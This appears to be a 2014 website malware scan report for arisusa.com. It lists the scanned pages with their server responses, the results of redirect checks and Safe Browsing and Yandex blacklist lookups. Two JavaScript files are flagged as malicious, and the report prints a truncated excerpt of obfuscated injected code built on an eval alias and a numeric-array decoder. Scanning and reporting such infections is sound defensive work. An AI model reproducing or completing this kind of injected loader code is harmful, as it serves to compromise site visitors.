Scanned pages/files
| Request | Server response | Status |
http://arisusa.com/ | 200 OK Content-Length: 4149 Content-Type: text/html | clean |
http://arisusa.com/index.html | 200 OK Content-Length: 4149 Content-Type: text/html | clean |
http://arisusa.com/about-us.html | 200 OK Content-Length: 3326 Content-Type: text/html | clean |
http://arisusa.com/services.html | 200 OK Content-Length: 3077 Content-Type: text/html | clean |
http://arisusa.com/about-us | HTTP/1.1 200 OK Connection: close Date: Mon, 22 Dec 2014 19:57:55 GMT Accept-Ranges: bytes Server: Apache Vary: negotiate Content-Length: 3326 Content-Location: about-us.html Content-Type: text/html TCN: choice | clean |
http://arisusa.com/test404page.js | 404 Not Found Content-Length: 392 Content-Type: text/html | clean |
http://arisusa.com/portfolio.html | 200 OK Content-Length: 2444 Content-Type: text/html | clean |
http://arisusa.com/js/engine/jquery.js | 200 OK Content-Length: 80979 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=22;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,95,111,97,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,92,113,99,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,92,105,91,97,99,114,8 Antivirus reports:
| ||
http://arisusa.com/js/engine/script.js | 200 OK Content-Length: 9400 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=22;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,95,111,97,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,92,113,99,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,92,105,91,97,99,114,8 Antivirus reports:
| ||
http://arisusa.com/contact-us.html | 200 OK Content-Length: 3486 Content-Type: text/html | clean |
http://arisusa.com/contact-us | HTTP/1.1 200 OK Connection: close Date: Mon, 22 Dec 2014 19:57:59 GMT Accept-Ranges: bytes Server: Apache Vary: negotiate Content-Length: 3486 Content-Location: contact-us.html Content-Type: text/html TCN: choice | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: arisusa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:57:51 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4149
Content-Type: text/html
...4149 bytes of data.
GET / HTTP/1.1
Host: arisusa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:57:51 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4149
Content-Type: text/html
...4149 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: arisusa.com
Referer: http://www.google.com/search?q=arisusa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: arisusa.com
Referer: http://www.google.com/search?q=arisusa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=arisusa.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://arisusa.com/
Result: arisusa.com is not infected or malware details are not published yet.
Result: arisusa.com is not infected or malware details are not published yet.